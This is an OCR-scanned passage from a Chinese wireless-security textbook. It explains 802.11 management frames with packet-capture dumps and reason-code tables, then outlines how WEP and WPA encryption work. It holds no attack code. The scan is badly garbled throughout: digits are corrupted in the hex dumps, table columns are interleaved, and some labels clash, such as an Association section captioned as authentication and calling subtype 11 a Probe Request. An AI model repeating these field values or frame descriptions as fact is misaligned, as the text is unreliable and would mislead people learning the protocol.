内 指派 一 个 值 来 做 为 连接 识别 码 (AID) 。 

(3) Address 1 位 : BSSID。 此 位 包含 
发 送 端 当前 所 在 BSS 网 络 中 的 BSSID， 此 
BSS 建立 自 当前 所 连接 的 AP。 

(4) Address 2 位 。Transmitter Address 

(发 送 端 地 址 ) 。 此 为 PS-Poll 帧 的 发 送 端 
的 MAC 地 址 。 

在 PS-Poll 帧 中 并 未 包含 duration 信 息 ， 
因此 无 法 更 新 NAV。 不 过 ， 所 有 收 到 PS- 
Poll 帧 的 工作 站 ， 都 会 以 短 帧 间隔 加 上 发 
送 ACK 信 号 所 需要 的 时 间 来 更 新 NAV 。 
此 处 的 自动 调整 机 制 ， 使 得 接 入 点 在 发 
送 ACK 信 号 时 ， 会 避免 与 移动 接 入 点 发 生 
碰撞 。 


6.3 ”管理 帧 


在 IEEE 802.11 协 议 中 存在 有 各 式 各 样 
的 管理 帧 ， 目 的 只 是 对 有 线 网 络 提供 简单 
的 服务 。 对 有 线 网 络 而 言 ， 识 别 一 部 工作 
站 非常 简单 ， 因 为 它们 服务 端 与 客户 端 必 
须要 有 物理 连接 。 无 线 网 络 则 必须 建立 一 
些 管理 机 制 ， 才 能 实现 类 似 的 功能 。 


6.3.1 管理 帧 的 结构 
无 线 网 络 以 及 处 理 接 入 点 之 间 关 联 的 转 
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移 事宜 。802.11 将 整个 管理 过 程 分 解 为 
三 个 步 又 : 

[Eee 国 寻求 连接 的 移动 工作 站 ， 必 须 找 出 可 
供 访问 的 无 线 网 络 。 在 有 线 网 络 中 ， 这 个 
步骤 相当 于 找 出 合适 的 网 络 接口 。 

[step 图 网 络 系统 必须 对 移动 工作 站 进行 身份 
认证 ， 以 此 为 依据 确定 是 否 让 工作 站 与 网 
络 系 统 进行 关联 。 在 有 线 网 络 方面 ， 身 份 
认证 是 由 网 络 系统 本 身 提供 。 如 果 必 须 通 
过 网 线 才 能 够 取得 信号 ， 那 么 获取 网 线 的 
过 程 可 以 理解 为 是 一 种 认证 过 程 。 


帧 控制 字段 详细 说 明 见 下 表 。 
表 ， 帧 控制 字段 详细 说 明 


长 度 
字 段 名 描 述 (位 ) 
Protocol 显示 帧 所 使 用 的 MAC 
(协议 版 本 ) 版 本 
描述 帧 的 类 型 ， 在 管 
Type (类 型 ) 理 帧 中 Type 字段 的 值 | 2 


为 00 
描述 帧 的 子 类 型 4 
与 From DS 位 一 起 指 


Subtype( 子 类 型 ) 


Bp 图 移动 工作 站 必须 与 接 入 点 建立 关联 ， 人 oDS | 
这 样 才 能 访问 有 线 网 络 ， 这 相当 于 将 网 线 ne 
> 与 TO DS 位 一 不 
9 多 乡 
持 到 有 线 网 络 系统 。 From Ds 帧 的 目的 地 是 否 为 分 |1 
下 图 为 802.11 管 理 帧 的 基本 结构 。 所 有 人 
由 的 示 头 都 一 这 与 
管理 帧 的 MAC 标 头 都 一 样 ， 这 与 由 的 子 类 一 中 
型 无 关 ， 管 理 帧 会 使 用 信息 元 素 〈 带 有 数字 ns | 
标签 的 数据 区 块 ) 来 与 其 他 系统 交换 数据 。 Retry 是 否 是 重 传 帧 1 
PE 全 加 号 Power Management | 是否 进 入 省 电 模式 | 1 
| 
ol@| oa SA ssp |oleyi rs pr 接 入 点 是 否 有 帧 待 传 
D Frame cotrol Sequence Control 给 休眠 中 的 工作 站 
@ Duration © Frame Body 是 五 受到 链 路 层 的 安 
各 个 字段 详细 说 明 见 下 表 。 Protected Frame 全 协议 的 保护 1 
表 802.11 管 理 帧 各 个 字段 的 说 明 Order 是 否 严格 依次 传送 。 |1 
字段 名 攻关 | 人， 子 类 型 (Subtype) 与 控制 帧 的 对 应 见 
Frame Control 描述 与 控制 MAC 帧 相关 下 表 。 
( 帧 控制 ) 信息 表 子 类 型 Subtype) 与 控制 帧 的 对 应 关系 
Duration 计算 帧 持续 时 间 的 作用 |2 子 类 型 控 制 帧 
Destination Address | MAC 帧 的 目的 地 址 6 0000 Association request (连接 请 求 ) 
Source Address MAC 帧 的 源 地 址 6 0001 Association response〈 连 接 响 应 ) 
用 于 过 滤 收 到 的 MAC 帧 0010 Reassociation request 〈 重 连接 请 求 ) 
BSSID (在 基础 型 网 络 里 为 工 六 、 
eaSSOCi ( 点 ) 
《基本 服务 集 ID) | 作 站 所 关联 的 接 入 点 的 | Sa A 
MAC 地 址 ) Oi Probe request( 探 测 请 求 ) 探测 请 求 
Sequence Control “| 用 来 重组 帧 片段 以 及 丢 le nla iA 
(顺序 控制 ) 弃 重 复 帧 2 0101 Probe response 〈 探 测 响应 》 
Frame Body i Beacon〈 信 标 ， 被 动 扫描 时 AP 发 出 , 
( 帧 主体 ) 用 以 传递 上 层 信息 | 0 232 | 0 notify) 最 为 复杂 的 一 个 帧 ， 也 是 需 
i 要 重点 关注 的 一 个 帧 类 型 
( 帧 校 验 序列 》 | 验证 传 来 的 帧 是 否 有 误 |4 1001 ATIM (通知 传输 指示 消息 ) 
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续 表 


子 类 型 控 制 帧 


1010 | Disassociation (解除 连接 ，notify) 
1011 | Authentication (身份 验证 ) 
1100 | Deauthentication (解除 认证 ，notify) 


1101~1111 | Reserved (保留 ， 未 使 用 ) 


6.3.2 Beacon ( 信 标 ) 帧 

每 间隔 一 段 时 间 AP 就 会 发 出 一 
Beacon〈 信 标 ) 信号 用 来 宣布 802.11 网 络 的 
存在 。Beacon 帧 中 除 包 含 BSS 参 数 信息 外 ， 
还 包含 接 入 点 缓存 帧 的 信息 ， 因 此 移动 式 
工作 站 要 仔细 聆听 Beacon 信 号。 

Beacon 帧 长 度 为 16 位 ， 用 来 设 定 Beacon 
信号 之 间 相 隔 多 少时 间 单 位 。 时 间 单 位 通常 
缩写 为 TU， 代 表 1024hs (microsecond) ， 相 
当 于 lms (millisecond) 。Beacon 通 常会 被 


设 定 为 100 个 时 间 单 位 ， 相 当 于 每 100ms， 
也 就 是 0.1s 传 送 一 次 Beacon 信 和 号。 
下 图 为 Beacon 帧 的 结构 。 


Mac heaaer 
6 


在 MAC 头 中 的 信息 ， 需 要 关注 以 下 数 
据 信 息 。 

(1) Type。 表 示 管 理 帧 ，Beacon 帧 属 
于 管理 帧 ， 所 以 这 里 值 为 0。 

(2) Subtype。 子 类 型 ， 这 里 值 为 十 六 
进 制 的 0x1000， 也 就 是 十 进 制 的 8， 所 以 
确定 为 Beacon 帧 。 

(3) RA、DA。 均 为 广播 地 址 段 。 

(4) TA、SA。 转 发 地 址 、 源 地 址 是 
AP 地 址 。 

(5) BSS ID。 网 络 中 的 标识 。 
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下 图 为 抓 包 软件 抓 取 的 真实 Beacon 帧 。 


~ IEEE 862.11 Beacon frame, Flags 
Type/Subtrype: Beacon frame 《exebaB) 
~ Frame Control Field: 9x8669 


-99.. = Type: Management frame (6) 

1668 .... Stypes 8 

.eee ee 站 8666 = Duration: © orpseconds 
Receiver address: Broadcast (ff:ff:ff:ff:ff:ff) 


Destination address: Broadcast (fl 
Transmitter address: Tp-LinkT_ 6d:97: 
Source address: Tp-LinkT_9d:97:a2 (ec 
BSS Id: Tp-LinkT_ed:97:a2 {60 ab e540 07 02) 
69668 = Fragment number: 9 
1611 1911 6111 .... = Sequence number: 2999 

~ IEEE 882.11 wireless LAN 

» Fixed parameters (12 bytes) 

» Tagged parameters (226 bytes) 


:ff) 
sss 8d:97:a2) 
d:97:a2) 


1. 帧 主体 


管理 帧 十 分 灵活 ， 帧 主体 (frame 
body) 中 的 大 部 分 数据 如 果 使 用 长 度 固定 
的 字段 ， 就 称 为 固定 字段 〈fixed field) ; 
如 果 字 段 长 度 不 确定 ， 就 称 为 信息 元 素 
(information element) 。 所 谓 信息 元 素 ， 
是 指 长 度 不 确定 的 数据 块 (data block) 。 每 
个 数据 块 均 会 标注 类 型 编号 和 大 小 ， 各 
信息 元 素 的 数据 字段 元 素 都 有 特定 的 解释 
方式 s 

下 图 为 Beacon 帧 主体 数据 及 Capability 
Info 字 段 。 


Beacon 由 主体 数据 及 Capability Info 字 
段 的 主要 信息 介绍 如 下 : 

(1) Timestamp (时 截 ) 。 
BSS 中 的 工作 站 ，BSS 的 主 计时 器 会 定期 
发 送 当 前 已 使 用 的 微 秒 数 。 当 计数 器 到 达 


可 用 来 同步 


最 大 值 时 ， 便 会 从 头 开 始 计数 。 (对 一 
个 长 度 64bit、 可 计数 超过 $80000 年 的 
计数 器 而 言 ， 很 难 会 遇 到 有 从 头 开 始 计数 
的 一 天 ) 
(2) Intrval。 定 时 发 送 位 ， 该 位 数据 表 
明 Beacon 帧 间隔 多 长 时 间 进 行 重 新 广播 。 
(3) Capability Info〈 性 能 信息 ) 字段 。 
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传送 Beacon 信号 的 时 候 ， 它 被 用 来 告知 网 
络 具 备 何 种 性 能 ， 此 字段 应 用 于 Beacon 帧 、 
Probe Response 帧 、Probe Request 帧 。 

2. Beacon 帧 标记 参数 

下 图 为 Beacon 帧 标记 参数 。 


INK_ 97AZ 
), 


主要 参数 介绍 如 下 : 

(1)SSID 信息 。 包 括 SSID 的 网 络 标识 、 
SSID 的 长 度 等 ， 如 果 设 置 隐藏 AP 抓 到 的 
数据 帧 中 SSID 为 空 ， 但 是 长 度 有 数据 ， 通 
过 这 点 可 以 判断 是 否 有 隐藏 AP。SSID 信 
息 如 下 图 所 示 。 


- Tag: SSID parameter set: TP-LINK_97A2 
Tag Number: SSID parameter set (6) 
Tag length: 12 
SSID: TP-LINK_97A2 


(2) Supported Rates 字段 。AP 所 支持 的 
工作 速率 ， 如 下 图 所 示 ， 通 过 这 个 速率 也 
可 以 大 概 判断 AP 是 支持 哪 种 IEEE 802.11 
协议 。 


Tag length: 8 
Supported Rates: 


Trbit7sec] 


1(8) (0x82) 
2(B) (0x84) 
5.5(B) (Ox8b) 
11(B) (Bx96) 
9 (x12) 

18 (Ox24) 


Supported Rates: 
Supported Rates; 
Supported Rates: 
Supported Rates; 
Supported Rates: 
Supported Rates; 
Supported Rates: 


(3) DS Parameter Set 字 段 。AP 工 作 
信道 ， 如 下 图 所 示 。 描 述 了 当前 工作 的 信 
道 ， 实 际 上 这 个 字段 在 Radiotap 中 有 。 
Radiotap 是 网 卡 在 接收 信号 时 ， 去 除 PLCP 
header 部 分 后 ， 在 本 地 增加 的 头 部 ， 其 中 就 
有 功率 、 信 道 这 样 的 物理 层 信息 。 

| et 


Tag length: 1 
Current Channel: 1 


AP 中 支持 的 扩展 速率 ， 如 右上 图 
所 示 。 


36 (gx48) 
54 (ex6c) 
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= Tag: Extended Supported Rates 6, 12, 24, 48, [Mbit/sec 
Tag Number: Extended Supported Rates (59) 
Tag length: 4 
Extended Supported Rates: 
Extended Supported Rates: 
Extended Supported Rates: 
Extended Supported Rates: 


(4) country 字段 。 表 面 上 这 个 字段 用 
处 不 大 ， 仅 仅 表明 了 国家 代号 。 实 际 上 这 
个 字段 是 用 来 控制 信号 发 送 功率 的 。 由 于 
每 一 个 国家 都 有 相应 的 法 律 管理 RF 发 射 
功率 ， 不 能 够 违法 。 在 beacon 中 ， 即 通过 
country 字段 来 限制 所 有 节点 的 发 射 功率 。 
同样 的 ， 也 有 限定 能 够 使 用 的 信道 范围 ， 
如 下 图 所 示 。 


6 (exec) 
12 (ex18) 
24 (ex30) 
48 (9x69) 


any (ox28) 
nto: FArst channel mber: 1, Number of channels; 13, Maxinn Tranenit Power Levels 20 den 


(5) TIM 标记 。 这 里 主要 就 是 与 DTIM 
有 关 ， 有 关 Beacon 周期 设置 与 节能 有 关 的 
部 分 ， 都 与 该 字段 有 关 ， 如 下 图 所 示 。 


Tag: Traffic Indication Map (TIM): DTIM 9 of 9 bitmap 
Tag Number: Traffic Indication Map (TIM) (5) 
Tag length: 4 
DTIM count: 9 
DTIM period: 1 
~ Bitmap control: 9x99 
ee 9 = Multicast: False 
9969 699. = Bitmap Offset: 9x99 
Partial Virtual Bitmap: 698 
Association ID: Ox93 


(6) Vendor Specific。 使 用 WPA 进行 数 
据 加 密 ， 不 是 每 个 设备 都 会 选取 该 字段 ， 
如 下 图 所 示 。 


Tag: Vendor Specificy Microsoft Corp.: WPA Infornation Elenent 
Tag Nunber; Vendor Specific (221) 
Tag length: 22 
OUI: 60:50:f2 (Microsoft Corp.) 
Vendor Specific OUI Type: 1 
Type: WPA Information Element (exel) 
WPA Version: 1 
™ Multicast Cipher Suite: 96:56:f2 (Microsoft Corp,) AES (CCN) 
Nulticast Cipher Suite OUI; 99:56:f2 (Microsoft Corp.) 
Multicast Cipher Suite type: AES (CCM) (4) 
Unicast Cipher Suite Count: 1 
~ Unicast Cipher Suite List 98:58:f2 (Microsoft Corp.) AES (CCN) 
» Unicast Cipher Suite: 00:50:f2 (Microsoft Corp,) AES (CCH) 
Auth Key Management (AKM) Suite Count: 1 
~ Auth Key Managenent (AKN) List 99:56:f2 (Microsoft Corp,) PSK 
~ Auth Key Managenent (AXN) Suite: 98:5e:f2 (Microsoft Corp.) PSK 
Auth Key Management (AKM) OUI: 96:56:f2 (Microsoft Corp.) 
Auth Key Management (AKM) type: PSK (2) 


(7) ERP information 部 分 。ERP 全 称 
是 Extended Rate PHY， 就 是 802.11g 对 应 
的 模式 。 在 这 里 主要 是 为 了 兼容 模式 所 存 
在 ， 主 要 关注 其 中 的 Non ERP Present 位 ， 
通过 该 位 ， 可 以 同步 全 网 开启 对 802.11b 的 
兼容 ， 和 否则 就 关闭 兼容 。 由 于 是 beacon 进 
行 同步 的 ， 所 以 一 旦 开启 ， 全 网 所 有 的 STA 
都 是 工作 在 兼容 模式 下 ， 如 下 图 所 示 。 
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~ Tag: ERP Information 

Tag Number: ERP Information (42) 

Tag length: 1 

~ ERP Information: 9x94 

Non ERP Present: Not Set 
Use Protection: Not set 
Barker Preamble Mode: Set 
Reserved: 9x99 


90960666 0... 


6.3.3 ”Probe Request (探测 请 求 ) 帧 


Probe Request (探测 请 求 ) 帧 ， 
一 般 用 于 STA 探 测 网 络 中 的 AP 时 来 使 用 ， 
有 两 种 形式 ， 第 1 种 形式 为 探测 网 络 中 所 有 
AP， 第 2 种 形式 为 探测 之 前 连接 过 的 AP。 
当 AP 接 收 到 ProbeRequest 请 求 后 并 且 STA 之 
前 连接 过 该 AP， 此 时 AP 会 回应 一 个 Probe 
Response《〈 回 应 探测 响应 ) 帧 。 

Probe Request 帧 的 MAC 头 信息 ， 如 
下 图 所 示 ， 其 中 Type 位 为 0， 表 明 是 管理 
帧 ，Subtype 位 为 4， 表 明子 类 型 为 Probe 
Request 帧 。 


FIEEE 602.11 Probe Request, Flags: ........ 
Type/Subtype: Probe Request (9x9964) 
~ Frame Control Field: gx4999 

= Version: 9 

= Type: Management frame (9) 

= Subtype: 4 

,Flags: 6x69 

.999 0000 9000 9999 = Duration: 9 microseconds 

Receiver address: Broadcast (ff:ff:ff:ff:ff: 1 

Destination address: Broadcast (ff 

Transmitter address: Google_eg: 

Source address: Google_eg:c2:23 (da:al: :c2:23) 
: Broadcast (ff:ff:ff:ff:ff:f 

. .... 9999 = Fragment numbi 

6116 1011 1010 ,.,，= Sequence number: 1722 


当 SSID 长 度 为 0 时 ，Probe 不 包含 具体 
的 SSID 信 息 ， 如 果 某 个 AP 隐 藏 了 SSID， 就 
不 回应 这 种 Probe Request， 如 下 图 所 示 。 


~ IEEE 892.11 wireless LAN 

~ Tagged parameters (65 bytes) 

~ Tag: SSID parameter set: Wildcard SSID 

Tag Number: SSID parameter set (9) 

Tag length: 9 

SSID: 
Tag: Supported Rates 1, 2, 5.5, 11, [Mbit/sec] 
Tag: Extended Supported Rates 6, 9, 12, 18, 24, 36, 
Tag: DS Parameter set: Current Channel: 1 
Tag: HT Capabilities (892.1in D1.19) 
Tag: Vendor Specific: Microsoft Corp.: Unknown 8 
Tag: Extended Capabilities (5 octets) 


当 SSID 长 度 大 于 0 时 ， 此 SSID 即 为 要 扫 
描 SSID， 如 果 SSID 隐 藏 ， 当 收 到 这 种 Probe 
Request 包 ， 必须 回应 Probe Response 帧 ， 
Probe Response 包 含 了 很 多 SSID 的 信息 ; 这 
种 类 型 的 包 对 于 连接 隐藏 SSID 是 必要 的 ， 
如 下 图 所 示 。 


~ IEEE 892.11 wireless LAN 

~ Tagged parameters (68 bytes) 

~ Tag: SSID parameter set: wan 

Tag Number: SSID parameter set (9) 

Tag length: 3 

SsID: wan 
Tag: Supported Rates 1, 2, 5.5, 11, [Mbit/sec] 
Tag: Extended Supported Rates 6, 9, 12, 18, 24, 36, 
Tag: DS Parameter set: Current Channel: 1 
Tag: HT Capabilities (892.11n D1.19) 
Tag: Vendor Specific: Microsoft Corp.: Unknown 8 
Tag: Extended Capabilities (5 octets) 


6.3.4 Probe Response (回应 探测 
响应 ) 帧 


加 Wo 
Probe Response 帧 的 MAC 头 信息 ， 如 峰 


下 图 所 示 ， 其 中 Type 位 为 0， 表 明 是 管理 喇 下 让 
帧 ，Subtype 位 为 5， 表 明子 类 型 为 Probe Re- 
sponse 帧 。 


9 
pe: Nanagement frane (9) 
ubtype: 5 


1111 = Duration: 223 microseconds 
Receiver address: Guangdon 6f:e7:df (38:29:5a:6f 
Destination address: Guangdon_6f:e7:df (3 


Transmitter address: HuaweiTe_7d:37:95 (e4 : : 
Source address: HuaweiTe_7d:37:95 (e4:6! 97 37 95) 
e_7d:37:95 (e4:68:a3:7d;37:;95) 
‘9689 = Fragment number: © 

. = Sequence number: 1154 


下 起 be Response 帧 数据 部 分 
信息 。 


EE 1 vireless LAN 
~ Fixed paraneters (12 byres) 
Tinest ap: Ox00000001bfed de 


Deacon Interval: 0.204600 [Seconds] 
~ capa lat ies"Intoraation: x8221 


Pt 2 = Aatematie Power Save Delivery: Not Inplenented 
中 Radio Measureaent Wot leplenented 
‘ 和 = SSS-OFDW: Not Allowed 
D 5 Delayed Bloch Ack: Not Teplenented 
= Immedlate Block Ack: NOt Laplenenced 
tes) 


S58), M00), 0, 9, 12, 18, twott/aoc] 


Country Inforaation! Ce 
TPC Report Transnit 

， Tag: ERN Information 
Tag: Extended Supparted Aates 24, 36, ag, 4, [Moit/sec] 
» Tag: Yendor Specific: Nicrosoft Corp' ; wAN/WE; Paraneter Elenent 
Teg: Vendor Specific: Atheros Comeunications, Ine.: Advanced Capablllty 


其 中 ，Beacon Iterval 字 段 给 出 了 Beacon 
帧 发 送 间隔 ，ESS 字 段 表明 该 数据 由 AP 端 
发 送 ， 其 中 Tagged 标 记 中 还 会 给 出 SSID 以 
及 传输 速率 ，AP 是 根据 SSID 以 及 传输 速率 
判断 此 STA 是 否 连接 过 ， 如 果 这 两 个 字段 
相同 ， 即 使 STA 与 AP 之 前 并 没有 建立 过 连 
接 ，AP 也 会 回应 Probe Response 帧 数据 。 


as Ch, enviromaent wy 
,Link argin: 2 


6.3.5 ”Association (身份 认证 ) 帧 
Association (身份 认证 ) 帧 的 MAC 头 着 


oy 
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信息 ， 如 下 图 所 示 ， 其 中 Type 位 为 0， 表 明 
是 管理 帧 ，Subtype 位 为 11， 表 明子 类 型 为 
Probe Request 帧 . 


IEEE 802.11 Authentication, Flags: 
Type/Subtype: Authentication (9x9eeb) 
~ Frame Control Field: Oxbe9e 
和 89 = Version: © 
= Type: Management frame (9) 
Subtype: 11 


.999 9996 1101 1111 = Duration: 223 microseconds 
Receiver address: Guangdon_6f:e7:df (38:29: 
Destination address: Guangdon_6f:e7:df (38: 
Transmitter address: HuaweiTe_7d:37:92 (e4 
Source address: HuaweiTe 7d:37:92 (e4:68:a3:7d:37 
BSS Id: HuaweiTe 7d:37:92 (e4:68:a3:7d:37:92) 
Fragment number: © 

.= Sequence number: 256 


下 图 为 Association 由 数据 部 分 。 


~ IEEE 802.11 wireless LAN 
~ Fixed parameters (6 bytes) 
Authentication Algorithm: Open System (9) 
Authentication SEQ: 9x9962 
Status code: Successful (9x9966) 


主要 参数 介绍 如 下 : 

(1) Authentication Algorithm。 身份 认 
证 类 型 ， 取 值 为 0 代表 开发 系统 身份 认证 
无 须 密码 ， 取 值 为 1 代表 为 共享 密 钥 身份 
认证 。 

(2) Authentication SEQ。 身份 认证 帧 
序列 号 ， 由 于 身份 认证 会 有 多 个 帧 交换 ， 
所 以 SEQ 是 每 次 身份 验证 的 中 的 一 个 序列 
号 ， 取 值 为 1 ~ 65535 这 个 范围 。 

(3) Status Code。 认 证 是 否 成 功 。 

(4) Challenge text。 该 字段 只 有 使 用 共 
享 密 钥 才 会 出 现 ， 用 于 存放 密 钥 。 


时 6.3.6 Association Request 与 
Association Response 


当 移 动工 作 站 试图 关联 接 入 点 时 ， 接 
入 点 会 回复 一 个 Association Response (关联 
响应 ) 或 Reassociation Response (重新 关联 
响应 ) 帧 ， 两 者 之 间 的 差别 在 于 Frame Con- 
trol 位 所 记载 的 subtype 位 。 所 有 位 均 是 必须 


Type: Management frame (9) 
= Subrype: 9 


.968 6991 9611 1619 = Durati 
Receiver address: 62:1f:3f 
Destination address: 62:1f 
Transmitter address: Guang: 
Source address: Guangdon_1: 
BSS Id:; 62:1f:8f:7f:5e:4d (62:1f:8f: 
ej ‘9689 = Fragment number: © 

6611 1011 9616 .... = Sequence number: 946 


下 图 为 Association Request 帧 数据 
部 分 。 


FTEEE BO wireless IAN 
* Fixeq paraaerers (4 Dytes) 


- pck; Mok Implemente 
ee Not apdonented 
USten Tnterval: xo0e? 
Ted parameters (85 bytrs) 
"Tag: S10 PAramerer or CHCC-SHARE 
， Tag: Supported Rates 1(3), 2(0), 5.5(0), 14(0), 10, 24, 36, 
» Ta0; Extended Supoorted RAtes 6, 9, 12, 45, [Mbit/Sec] 
，Tag: HT Capabllitles (892.11n D1.19) 
» Tag: Vendor Specific; Mcrosoft Corp.: WA/WME: Information Element 


下 图 为 Association Response (关联 响 
应 ) 帧 MAC 信 息 。 


4, [Noit/sec] 


: Nanagement frane (8) 
= Subtype: 1 


000 6000 9111 1111 = Duratit 
Receiver address: 90:be:6c:1: 
Destination address 
Transmitter address: Huawe: 
Source address: HuaweiTe_7d: 


9661 6999 9991 .... 


下 图 为 Association Response 帧 数据 


= Sequence number: 257 


Auromaric Power Save Delivery: Not Inplemented 
Radi0 Measurenent: NOt Inplemented 

DSSS-OFDN: Not ALLowed 

Delayed Dlock Ack: Not rnplemented 

Tamedinfe Rlock Met Not Tenleaented 

ul (Gxo0e8) 

Aaron 10: aa 


~ Tagge paraserers (42 py 
a op nstae 4)) a(8), ss(0), 6, 9, 11(8), 13, 48, mateyese 
Ja; Ertended Supported Rates 24 36, a, S34, [Mbit/sec]” 
» Tag: Yendor Specific Microsoft Corp.: W/WHE: Paraneter Eleeent 


的 。 在 应 答 的 过 程 中 ， 接 入 点 会 指定 一 个 
Association ID (关联 识别 码 ) ， 至 于 指定 
的 方式 则 因 实 际 操作 而 不 同 。 

下 图 为 Association Request (关联 请 
求 ) 帧 的 MAC 信 息 。 
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其 中 Status code 字 段 表 明 是 否 关联 成 
功 ，Association ID 字段 是 关联 成 功 后 AP 给 
客户 端的 一 个 ID， 用 于 标记 在 AP 关联 列表 
中 ， 也 用 于 客户 端 唤醒 时 使 用 。 


6.3.7 Disassociation 与 Deauthentication 


Disassociation 〈 取 消 关 联 ) 帧 用 来 取 
消 一 段 关 联 关系 ， 而 Deauthentication ( 解 
除 认 证 ) 帧 则 用 来 解除 一 段 认 证 关系 。 两 
者 均 包含 一 个 固定 位 Reason Code (原因 代 
码 ) ， 当 然 Frame Control 位 彼此 不 同 ， 因 为 
不 同类 型 的 管理 帧 拥有 不 同 的 子 类 型 。 

下 图 为 Disassociation 巾 数据 信息 。 


00.. = Type: Managenent frane (8) 
1816 .... = Subtype 18 


,Flags: 1 
090 8989 B111 1111 = Duration: 127 nicroseconds 
ddress; VivoMobi_ 34:62:06 (19:f6:81:34:62:35) 
p33; VivoNobi_ 04:62:06 (10:f6:81:84:52795) 


= Sequence nunber: 258 
ss LAN 
(2 bytes) 


isassociated because sending STA 1s leaving (or has left) BSS (ex9998) 


下 图 为 Deauthentication 帧 信息 。 


:9 
00 ype: Management frame (0) 
1100 = Subtype: 12 


6869 9969 G111 1111 = Duratio 
Receiver address: XiaomiCo_b5 
Destination address: Xiaomil 
Transmitter address: Huawei 
Source address: HuaweiTe_8c:1 
BSS 1d; HuaweiTe_8c:10:a5 (b4: 

.9600 = Fragment number 


O061 6666 1616 = Sequence number: 266 
~ IEEE 802.11 wireless LAN 
~ Fixed parameters (2 bytes) 
Reason code， Previous authentication no longer valid (bx9992) 


其 中 Reason code 字 段 表明 取消 关联 或 
者 解除 认证 的 方式 ， 见 下 表 。 
表 ”取消 关联 或 者 解除 认证 的 方式 


Reason 
Description Meaning0 
Code 
0 No Reason Code Normal operation 
Client associated but 
1 Unspecified Reason i 
no longer authorized 
Previous . 
i Client associated but 
入 Authentication no 
not authorized 
longer valid 
Deauthenticated 
Deauthentication because sending STA 
leaving is leaving IBSS or 
ESS 
本 Disassociation Due | Client session 
to Inactivity timeout exceeded 


第 6 章 ”数据 帧 的 结构 与 加 密 原理 
Description Meaning0 
APisbusy and 
Disassociation AP unable to handle 
Busy currently associated 
clients 
Client attempted t 
Class2 Frame from a % 
Non-Authenticated SA ON: 
四 1t Was 
Station 
Authenticated 
Client attempted to 
Class3 Frame from 
transfer data before 
Non-Associated 
Station ES 
Associated 
Disassociation STA | STA is leaving or has 
has Left left BSS 
STA Request STA(re) association 
Association is not authenticated 
Without with 
Authentication Responding station 
Missing Reason Client momentarily 
Code in an unknown state 


6.4 ”无 线 通 信 加 密 原理 


在 了 解 了 无 线 通信 的 数据 帧 结构 后 ， 
下 面 介绍 无 线 通 信 的 加 密 原 理 ， 目 前 无 线 
通信 中 的 加 密 方 式 有 两 种 ， 分 别 是 WEP 与 
WPA。 其 中 ，WAP 又 分 为 WPA1 与 WPA2 
两 种 。 


6.4.1 WEP 的 加 密 原理 

WEP 通 过 RC4 算 法 进行 加 密 ， 通 过 首 
CRC32 算 法 进行 数据 完整 性 校 验 。RC4 加 密 
解密 的 原理 如 下 。 


加 密 解密 

1011 B 1000 8 
xor 0011 3 xor 0011 3 

1000 8 1011 B 


有 


黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 ( 超 值 版 ) 


WEP 整 个 加 密 过 程 可 以 通过 一 张 图 来 
描述 ， 如 下 图 所 示 。 其 中 ,IV (Initializa- 


tion Vector) 为 初始 向 量 ， 由 客户 端 随机 


整个 WEP 加 密 的 过 程 ， 如 果 要 分 步骤 
来 描述 ， 可 以 分 为 以 下 几 个 步骤 : 
step 图 由 客户 端 随机 生成 LV， 然 后 与 无 线 密 
码 相 结合 生成 KSA (初始 向 量 表 ) 。 
[step 图 原始 发 送 数 据 通过 CRC32 生 成 ICV 
(数据 完整 性 校 验 信息 ) 。 
[step 图 原始 数据 与 ICV 结 合生 成 数据 流 。 
[sep 国 通过 PRGA 算 法 结合 数据 流 长 度 ， 计 
算 生 成 密 钥 流 。 密 钥 流 与 数据 流 是 一 一 对 
[step 图 密 钥 流 与 数据 流 异 或 运算 得 到 加 密 后 
数据 。 
[ep 图 发 送 数 据 包 头 部 包含 IV 信 息 ， 尾 部 
包含 ICV 信 息 ， 如 果 发 送 数据 超出 数据 包 大 
小 ， 会 对 数据 包 进行 切片 处 理 ， 此 时 IV 后 
面 会 跟 上 Key ID，Key ID 用 于 标识 该 数据 包 
是 切片 后 数据 包 的 第 几 个 包 。 


6.4.2 ”WPA 的 加 密 原理 


WPA 分 为 WPA1 和 WPA2， 最 早出 现 
WPA1 是 因为 WEP 存 在 严重 漏洞 ， 因 此 
WPA1 的 出 现 是 为 了 解决 当时 WEP 所 存在 的 
缺陷 ， 它 是 在 WEP 的 基础 上 通过 软件 实现 
密码 扩充 。 

WPA1 与 WEP 的 相同 之 处 在 于 它们 都 是 
采用 逐 包 加 密 ，128 位 的 Key 和 48 位 的 初始 
向 量 CIV) ， 同 样 使 用 RC4 流 加 密 技术 ， 
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不 过 ，WPA1 采 用 了 帧 计数 器 ， 可 以 有 效 避 
免 数 据 重 放 攻 击 ， 并 且 采 用 了 TKIP (动态 
WEP) 算法 ，TKIP 由 RC4+Michael 完 整 性 
校 验 所 组 成 。 

WPA2 则 是 依据 802.11 全 新 设计 来 实现 
的 ， 它 使 用 CCMP 蔡 代 了 TKIP， 使 用 AES 
加 密 算法 蔡 代 了 RC4 算 法 ， 由 于 是 全 新 设计 
的 ， 因 此 不 向 下 兼容 WEP 设 备 。 

WPA 在 数据 通信 中 会 有 三 个 过 程 : 

1. 协商 安全 协议 

协商 认证 方式 中 STA 会 通过 探测 帧 获取 
到 AP 中 的 网 络 信息 ， 其 中 包括 速率 、 加 密 
方式 、 信 道 以 及 网 络 名 称 ， 同 样 会 协商 通 


信 模 式 采用 单 播 、 组 播 还 是 广播 ， 加 密 套 
件 使 用 TKIP 还 是 CCMP。 


2. 密 钥 分 发 和 验证 

无 线 网 络 设计 用 于 一 组 无 线 设备 通信 ， 
关联 到 同一 设备 共享 无 线 信道 ， 根 据 通信 安 
全 特性 不 同 ， 分 为 单 播 、 组 播 和 广播 。 

单 播 通信 是 AP 与 STA 之 间 的 一 个 私密 
通信 ， 因 此 它们 会 保存 彼此 的 一 个 私 钥 PTK 
(Pairwise Key) 也 被 称 为 点 到 点 密 钥 ， 这 个 
密 钥 是 临时 性 的 ， 一 旦 到 期 需要 重新 计算 。 

组 播 通信 是 AP 与 域内 所 有 成 员 共享 的 
同一 密 钥 GTK (Group Key) 组 密 钥 ， 这 个 
密 钥 在 域内 的 所 有 成 员 都 知道 ， 用 于 AP 发 
送 组 播 使 用 。 

广播 通信 一 般 是 不 加 密 的 ， 主 要 用 于 
AP 向 整个 区 域 宣告 存在 ， 任 何 本 区 域 的 设 
备 都 可 以 获取 到 广播 信息 。 


3. 数据 加 密 完整 性 校 验 

PMK (Pairwise Master Key) 是 一 串 
